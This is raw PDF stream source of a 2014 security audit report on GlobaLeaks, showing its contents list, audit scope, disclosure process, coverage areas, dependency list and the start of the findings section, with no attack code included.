Tj T* ET Q Q q 1 0 0 1 397.8898 273 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 255 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-06) Tj T* ET Q Q q 1 0 0 1 397.8898 255 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (40) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 237 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-07) Tj T* ET Q Q q 1 0 0 1 397.8898 237 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 219 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-10) Tj T* ET Q Q q 1 0 0 1 397.8898 219 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 201 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-11) Tj T* ET Q Q q 1 0 0 1 397.8898 201 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* 
-60.88 0 Td ET Q Q q 1 0 0 1 0 183 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-12) Tj T* ET Q Q q 1 0 0 1 397.8898 183 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 165 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-13) Tj T* ET Q Q q 1 0 0 1 397.8898 165 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (41) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 147 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-14) Tj T* ET Q Q q 1 0 0 1 397.8898 147 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 129 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-17) Tj T* ET Q Q q 1 0 0 1 397.8898 129 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 111 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-18) Tj T* ET Q Q q 1 0 0 1 397.8898 111 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 93 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-19) Tj T* ET Q Q q 1 0 0 1 397.8898 93 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 75 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-20) Tj T* ET Q Q q 1 0 0 1 397.8898 75 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (42) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 57 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix B. Brainstorming Notes) Tj T* ET Q Q q 1 0 0 1 397.8898 57 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (43) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 39 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix C. 
Script for Issue E) Tj T* ET Q Q q 1 0 0 1 397.8898 39 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (46) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 21 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix D. Side-Channel Attack Proof of Concept) Tj T* ET Q Q q 1 0 0 1 397.8898 21 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (47) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix E. Computing Multiple Target Guessing Success Probabilities) Tj T* ET Q Q q 1 0 0 1 397.8898 3 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (49) Tj T* -60.88 0 Td ET Q Q q Q Q q 1 0 0 1 62.69291 189.0236 cm Q endstream endobj % 'R345': class PDFStream 345 0 obj % page stream << /Length 2379 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Overview) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.050651 Tw (Least Authority performed a security audit of GlobaLeaks on behalf of the Open Technology Fund. The) Tj T* 0 Tw .020751 Tw (audit consisted primarily of developer interviews, design analysis, and code review. We also experimented) Tj T* 0 Tw (with software locally to test hypotheses.) Tj T* ET Q Q q 1 0 0 1 62.69291 672.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Report Revision) Tj T* ET Q Q q 1 0 0 1 62.69291 642.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.200651 Tw (This report is the final draft of the audit findings, delivered on 2014-03-21. Several unfinished revisions) Tj T* 0 Tw (were shared with the development team throughout the audit.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 612.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Audit Scope) Tj T* ET Q Q q 1 0 0 1 62.69291 582.0236 cm q BT 1 0 0 1 0 14 Tm 3.307674 Tw 12 TL /F1 10 Tf 0 0 0 rg (The focus for this audit was the ) Tj 0 0 .501961 rg (GLBackend ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (GLClient ) Tj 0 0 0 rg (codebases. Interactive and automated) Tj T* 0 Tw (penetration testing targeted installations local to the auditors.) Tj T* ET Q Q q 1 0 0 1 62.69291 552.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Methodology and Disclosure) Tj T* ET Q Q q 1 0 0 1 62.69291 510.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .52748 Tw (Our audit techniques included manual code analysis, user interface interaction, and whitebox penetration) Tj T* 0 Tw 3.646651 Tw (testing. After delivering this report to the development team, we continue to work with them on) Tj T* 0 Tw (remediations.) Tj T* ET Q Q q 1 0 0 1 62.69291 468.0236 cm q BT 1 0 0 1 0 26 Tm 2.793516 Tw 12 TL /F1 10 Tf 0 0 0 rg (We promote a very transparent process, and all of our findings will find their way onto the public) Tj T* 0 Tw .114147 Tw 0 0 .501961 rg (GlobaLeaks Issue Tracker) Tj 0 0 0 rg (, once we believe sufficient remediation protects existing users. Additionally, we) Tj T* 0 Tw (will collaborate with that team to publish this report.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 468.0236 cm Q endstream endobj % 'R346': class PDFStream 346 0 obj % page stream << /Length 7928 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Process) Tj T* ET Q Q q 1 0 0 1 62.69291 726.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The process ) Tj /F4 10 Tf (Least Authority ) Tj /F1 10 Tf (uses for security audits follows these phases:) Tj T* ET Q Q q 1 0 0 1 62.69291 720.0236 cm Q q 1 0 0 1 62.69291 720.0236 cm Q q 1 0 0 1 62.69291 666.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Project Discovery and Developer Interviews) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.55528 Tw (First, we look at the project's web site to get a high level understanding of what functionality the) Tj T* 0 Tw 1.075984 Tw (software under review provides. We then meet with the developers to gain an appreciation of) Tj T* 0 Tw (their vision of the software.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 660.0236 cm Q q 1 0 0 1 62.69291 618.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 27 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 27 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Familiarization and Exploration) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.779318 Tw (In this phase we install and use the relevant software, exploring the user interactions and roles.) Tj T* 0 Tw (While we do this, we brainstorm threat models and attack surfaces.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 612.0236 cm Q q 1 0 0 1 62.69291 558.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) 
Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Background Research) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.755366 Tw (After our initial exploration, we read design documentation, review other audit results, search for) Tj T* 0 Tw 3.692706 Tw (similar projects, examine source code dependencies, skim open issue tickets, and generally) Tj T* 0 Tw (investigate details other than the implementation.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 552.0236 cm Q q 1 0 0 1 62.69291 510.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 27 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (4.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 27 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Design and Implementation Investigation) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.589269 Tw 12 TL /F1 10 Tf 0 0 0 rg (In this phase we hypothesize what vulnerabilities may be present, creating ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (entries, and for) Tj T* 0 Tw (each we follow the following ) Tj 0 0 .501961 rg (Issue Investigation and Remediation ) Tj 0 0 0 rg (process.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 504.0236 cm Q q 1 0 0 1 62.69291 414.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 75 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (5.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 75 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Report Delivery) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 62 Tm 1.63436 Tw 12 TL /F1 10 Tf 0 0 0 rg (At this point in our schedule, we wrap up our investigative work. Any unresolved issues or open) Tj T* 0 Tw 1.152126 Tw (questions remain documented in the report. After delivering a report to the development team, ) Tj /F4 10 Tf (we) Tj T* 0 Tw 4.620751 Tw (refrain from editing ) Tj /F1 10 Tf (the report, even when there are factual errors, misspellings, or other) Tj T* 0 Tw .299213 Tw (embarrassments. 
Instead, we document those changes after the fact either in an ) Tj /F4 10 Tf (Addendum Report) Tj /F1 10 Tf (,) Tj T* 0 Tw 2.955366 Tw (or more typically in project specific development issue tracking tickets specific to the security) Tj T* 0 Tw (findings.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 408.0236 cm Q q 1 0 0 1 62.69291 342.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 51 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (6.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 51 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Remediation) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 2.45748 Tw (During this phase we collaborate with the developers to implement appropriate mitigations and) Tj T* 0 Tw .59186 Tw (remediations. It may be the case that the actual mitigations or remediations do not follow our report) Tj T* 0 Tw .275814 Tw (recommendations, due to the nature of design, code, operational deployment, and other engineering) Tj T* 0 Tw (changes, as well as mistakes or misunderstandings.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 336.0236 cm Q q 1 0 0 1 62.69291 294.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 27 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (7.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 27 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Publication) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.590697 Tw (Only after we agree with the development team that all vulnerabilities with sufficient impact have) Tj T* 0 Tw (been appropriately mitigated do we publish our results.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 294.0236 cm Q q 1 0 0 1 62.69291 264.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue Investigation and Remediation) Tj T* ET Q Q q 1 0 0 1 62.69291 210.0236 cm q BT 1 0 0 1 0 38 Tm .391647 Tw 12 TL /F1 10 Tf 0 0 0 rg (The auditors follow a ) Tj /F4 10 Tf (conservative) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (transparent ) Tj /F1 10 Tf (process for analyzing potential security vulnerabilities and) Tj T* 0 Tw 1.040814 Tw (seeing them through successful remediation. Whenever a potential issue is discovered, we immediately) Tj T* 0 Tw 1.678876 Tw (create an ) Tj /F4 10 Tf (Issue ) Tj /F1 10 Tf (entry for it in this document, even though we have not yet verified the feasibility and) Tj T* 0 Tw (impact of the issue.) Tj T* ET Q Q q 1 0 0 1 62.69291 144.0236 cm q BT 1 0 0 1 0 50 Tm .88436 Tw 12 TL /F1 10 Tf 0 0 0 rg (This process is conservative because we document our suspicions early even if they are later shown to) Tj T* 0 Tw 2.851797 Tw (not represent exploitable vulnerabilities. The process is transparent because we share intermediate) Tj T* 0 Tw 1.684983 Tw (revisions of this document directly with ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (, regardless of the state of polish. Additionally, we) Tj T* 0 Tw .849269 Tw (attempt to communicate our evolving understanding and refinement of an issue through the ) Tj /F2 10 Tf (Status ) Tj /F1 10 Tf (field) Tj T* 0 Tw (\(see ) Tj 0 0 .501961 rg (Issue Format ) Tj 0 0 0 rg (next\).) Tj T* ET Q Q q 1 0 0 1 62.69291 78.02362 cm q BT 1 0 0 1 0 50 Tm .216412 Tw 12 TL /F1 10 Tf 0 0 0 rg (We generally follow a process of first documenting the suspicion with unresolved questions, then ) Tj /F4 10 Tf (verifying ) Tj T* 0 Tw 1.962126 Tw /F1 10 Tf (the issue through code analysis, live experimentation, or automated tests. 
Code analysis is the most ) Tj T* 0 Tw .889983 Tw (tentative verification, and we strive to provide test code, log captures, or screenshots demonstrating our ) Tj T* 0 Tw .014987 Tw (verification. After this we analyze the feasibility of an attack in a live system. Next we search for immediate ) Tj T* 0 Tw 2.583828 Tw /F4 10 Tf (mitigations ) Tj /F1 10 Tf (that live deployments can take, and finally we suggest the requirements for ) Tj /F4 10 Tf (remediation) Tj T* 0 Tw ET Q Q endstream endobj % 'R347': class PDFStream 347 0 obj % page stream << /Length 620 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 753.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (engineering for future releases.) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 4.770888 Tw (The mitigation and remediation recommendations should be scrutinized by the developers and) Tj T* 0 Tw 1.890888 Tw (deployment engineers, and successful mitigation and remediation is an ongoing collaborative process) Tj T* 0 Tw (after we deliver our report, and before the details are made public.) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm Q endstream endobj % 'R348': class PDFStream 348 0 obj % page stream << /Length 6397 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Coverage) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q BT 1 0 0 1 0 26 Tm 2.37998 Tw 12 TL /F1 10 Tf 0 0 0 rg (Our coverage focused on user interface and usability exploration, then ) Tj /F4 10 Tf (GLBackend ) Tj /F1 10 Tf (code, examining) Tj T* 0 Tw 4.970976 Tw (exception handling, concurrency issues, entropy API usage, cross-site request forgery, session) Tj T* 0 Tw (management, logging, side channels, and persistent storage.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 672.0236 cm q BT 1 0 0 1 0 14 Tm .090651 Tw 12 TL /F1 10 Tf 0 0 0 rg (We also examined the client codebase to perform some basic XSS testing, examined clock skew between) Tj T* 0 Tw (client and server, and studied the ) Tj 0 0 .501961 rg (Angular ) Tj 0 0 0 rg (templating system.) Tj T* ET Q Q q 1 0 0 1 62.69291 654.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Our depth of coverage of these areas is modest to moderate.) Tj T* ET Q Q q 1 0 0 1 62.69291 636.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A detailed log of our investigations is in ) Tj 0 0 .501961 rg (Appendix A. Work Log) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 606.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Target Code) Tj T* ET Q Q q 1 0 0 1 62.69291 579.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Revision) Tj T* ET Q Q q 1 0 0 1 62.69291 549.0236 cm q BT 1 0 0 1 0 14 Tm 2.326136 Tw 12 TL /F1 10 Tf 0 0 0 rg (This audit targets the ) Tj 0 0 .501961 rg (GLBackend 2.52.3 ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (GLClient 2.52.3 ) Tj 0 0 0 rg (release revisions, which comprise the) Tj T* 0 Tw (server and browser-client components of GlobaLeaks.) Tj T* ET Q Q q 1 0 0 1 62.69291 522.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Dependencies) Tj T* ET Q Q q 1 0 0 1 62.69291 492.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.245697 Tw (Although our primary focus was on the application code, we examined dependency code and behavior) Tj T* 0 Tw (where relevant to a particular line of investigation.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 474.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GLBackend ) Tj /F1 10 Tf (dependencies are:) Tj T* ET Q Q q 1 0 0 1 62.69291 458.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (Twisted) Tj T* ET Q Q q 1 0 0 1 62.69291 443.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (An asynchronous I/O and scheduling framework.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 427.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (apscheduler) Tj T* ET Q Q q 1 0 0 1 62.69291 412.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Advanced Python Scheduler. A task scheduling library.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 396.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (zope.component) Tj T* ET Q Q q 1 0 0 1 62.69291 381.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (This is not imported in the source code.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 365.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (zope.interface) Tj T* ET Q Q q 1 0 0 1 62.69291 350.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (An abstraction framework for Python, used by ) Tj /F4 10 Tf (Twisted) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 334.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (cyclone) Tj T* ET Q Q q 1 0 0 1 62.69291 319.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A web application framework for ) Tj /F4 10 Tf (Twisted) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 303.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (Storm) Tj T* ET Q Q q 1 0 0 1 62.69291 288.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (An Object-Relational Model \(ORM\).) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 272.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (transaction) Tj T* ET Q Q q 1 0 0 1 62.69291 257.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A transaction management library.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 241.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (txsocksx) Tj T* ET Q Q q 1 0 0 1 62.69291 226.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A ) Tj /F3 10 Tf (SOCKS ) Tj /F1 10 Tf (protocol implementation for ) Tj /F4 10 Tf (Twisted) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 210.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (pycrypto) Tj T* ET Q Q q 1 0 0 1 62.69291 195.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A cryptographic library.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 179.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (scrypt) Tj T* ET Q Q q 1 0 0 1 62.69291 164.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (An implementation of the ) Tj /F3 10 Tf (scrypt ) Tj /F1 10 Tf (password hashing algorithm.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 148.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F5 10 Tf 12 TL (python_gnupg) Tj T* ET Q Q q 1 0 0 1 62.69291 133.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (A wrapper around the ) Tj /F4 10 Tf (GnuPG ) Tj /F1 10 Tf (encryption tool.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 103.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Target Configuration) Tj T* ET Q Q endstream endobj % 'R349': class PDFStream 349 0 obj % page stream << /Length 475 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 26 Tm 2.28998 Tw 12 TL /F1 10 Tf 0 0 0 rg (We analyzed a configuration with all-default settings, except sometimes disabling the requirement to) Tj T* 0 Tw 1.889318 Tw (access the backend over ) Tj /F4 10 Tf (Tor) Tj /F1 10 Tf (. The backend was installed in each auditor's Ubuntu system, usually a) Tj T* 0 Tw (virtual machine.) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm Q endstream endobj % 'R350': class PDFStream 350 0 obj % page stream << /Length 5918 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Findings) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Vulnerabilities) Tj T* ET Q Q q 1 0 0 1 62.69291 684.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.916412 Tw (This section describes security vulnerabilities. We err on the side of caution by including potential) Tj T* 0 Tw (vulnerabilities, even if they are currently not exploitable, or if their impact is unknown.) Tj T* ET Q Q q 1 0 0 1 62.69291 654.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.107045 Tw (The issues are documented in the order of discovery. We do not attempt to prioritize by severity or) Tj T* 0 Tw (mitigation needs. Instead we work with the development team to help them make those decisions wisely.) 
